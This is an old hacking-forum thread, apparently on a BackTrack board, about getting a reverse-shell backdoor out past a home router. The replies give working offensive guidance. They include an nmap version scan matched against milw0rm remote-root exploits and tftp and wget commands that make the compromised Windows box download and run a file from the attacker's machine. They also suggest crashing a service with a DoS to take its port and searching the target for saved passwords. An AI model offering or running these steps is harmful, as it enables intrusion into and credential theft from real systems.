Results 1 to 9 of 9

Thread: Install exploitable content

  1. #1
    Junior Member
    Join Date
    Mar 2008
    Posts
    28

    Default Install exploitable content

    Hey i was just wondering if there was anything you could do from command promp in windows that could be exploit'd,
    By that i mean i'v made a netcat backdoor loaded it on my windows box right,, gotten it to reverse connect to backtrack,, and now i have root accesss,, yay,,
    but you see i like the meterpreter dealio,, so i was wondering if there was anything you could upload and run or try to connect back to backtrack with something that you could exploit,, not shaw,, i was able to exploit netcat110_nt wile in my own network,, but when i try to do that from outside my network my router is blocking the port i need to exploit,, you see my problem.. any help would be greatfull,,,,

  2. #2
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    So what do you want?
    To get around port blocking, if your trying a reverse connection from your windows box to your bt box, then you would want to use port 80 probably as its 99.9% of the time not blocked. If your trying to forward connect to your windows box, then you would have to either hack the router, or find a web service thats running on that box (and the router forwards to it), crash it (with a DOS attack probably) and have your service steal the port it was listening on.

    Hope this helps

  3. #3
    Junior Member
    Join Date
    Mar 2008
    Posts
    28

    Default

    How do you do a dos attack,, got any good links? yeah iv try'd that port 80 thing dosnt work.. im trying to find a service that from the windows box connects to backtrack,, like tftp of telnet or any thing that connect's out of the windows box so that it pass's throught the router, and then i can exploit it,,,

  4. #4
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    For a DOS attack, you would want to get the service version and OS info using a tool like nmap (e.g. nmap -sV -O <host>) then find a working exploit for that service (e.g. from milw0rm)

    As an example

    Code:
    bt ~ # nmap -sV -O 127.0.0.1
    
    Starting Nmap 4.50 ( http insecure org ) at 2008-06-20 16:08 GMT
    Interesting ports on bt.example.net (127.0.0.1):
    Not shown: 1706 closed ports
    PORT     STATE SERVICE   VERSION
    25/tcp   open  smtp      Sendmail 8.14.1/8.14.1
    80/tcp   open  http      Apache httpd 2.2.4 ((Unix) DAV/2)
    587/tcp  open  smtp      Sendmail 8.14.1/8.14.1
    5800/tcp open  vnc-http?
    5900/tcp open  vnc       VNC (protocol 3.3)
    Device type: general purpose
    Running: Linux 2.6.X
    OS details: Linux 2.6.17 - 2.6.21
    Uptime: 0.134 days (since Fri Jun 20 12:57:01 2008)
    Network Distance: 0 hops
    Service Info: OS: Unix
    
    OS and Service detection performed. Please report any incorrect results at http: insecure.org/nmap/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 35.536 seconds
    
    bt ~ # cd /pentest/exploits/milw0rm/
    bt milw0rm # cat sploitlist.txt | grep -i sendmail
    ./platforms/linux/remote/24.c Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
    ./platforms/linux/local/411.c Sendmail 8.11.x Exploit (i386-Linux)
    ./platforms/linux/dos/2051.py Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC
    ./platforms/multiple/remote/4761.pl Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
    ./rport/25/24.c Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
    ./rport/25/4761.pl Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
    bt milw0rm #
    However, as you can see, there are no exploits for my version of sendmail, so this technique won't always work.

    If you want to use tftp to make the windows box download something from you, you'll need to start a tftp server on your backtrack box first. So put your file in /tmp then:

    Code:
    atftpd --daemon --port 69 /tmp
    And on your windows machine:

    Code:
    tftp -i <yourip> GET <filename>
    Now you can simply execute the file on your windows box.

    When your done, do
    Code:
    killall atftpd
    to stop the tftp server

  5. #5
    Junior Member
    Join Date
    Mar 2008
    Posts
    28

    Default

    cool thanks.. but what im trying to say is, when i nmap i get nothing because im trying to audit through my router,,,, and theres nothing, so i thought if i start a service from the inside then i could exploit it,, but the question is what service,,, i have command prompt so thats kinda limited,, or maby upload a service and run that ,,,,, the question is really what service can i exploit upon reverse connection..

  6. #6
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by CrispyJones View Post
    cool thanks.. but what im trying to say is, when i nmap i get nothing because im trying to audit through my router,,,, and theres nothing, so i thought if i start a service from the inside then i could exploit it,, but the question is what service,,, i have command prompt so thats kinda limited,, or maby upload a service and run that ,,,,, the question is really what service can i exploit upon reverse connection..
    There is a VERY long list of exploitable services ranging to specific releases to entire generations of software. Google is your friend, do your homework on exploitable services first, try some things out, and then come back if you have any issues, or simply come back to say "Hey, I figured it out! This is what I did....."



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    so you have your remote shell, and I presume that outbound port 80 is allowed? If so then it should be possible to start a atftpd server on port 80 and get the windows machine to dl from it. If port 80 UDP is filtered the you will need another method (idk to be honest, i dont use windows command prompt much. If it was a linux shell, you could start apache and wget your exploit). If your bt box is behind a router, then you will need to do some port forwarding on that.

    Apart from that, the best you can probably do is explore the filesystem, find software versions, and see if you can find any exploits for them. You could also search for saved passwords (like for your routers web interface etc...). I cant remember the windows registry commands but if you google for them im sure they would be helpful.

  8. #8
    Junior Member
    Join Date
    Mar 2008
    Posts
    28

    Default

    thanks that helps windows does have wget,, il have to give that a try

  9. #9
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    You learn something every day
    Should do the trick

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •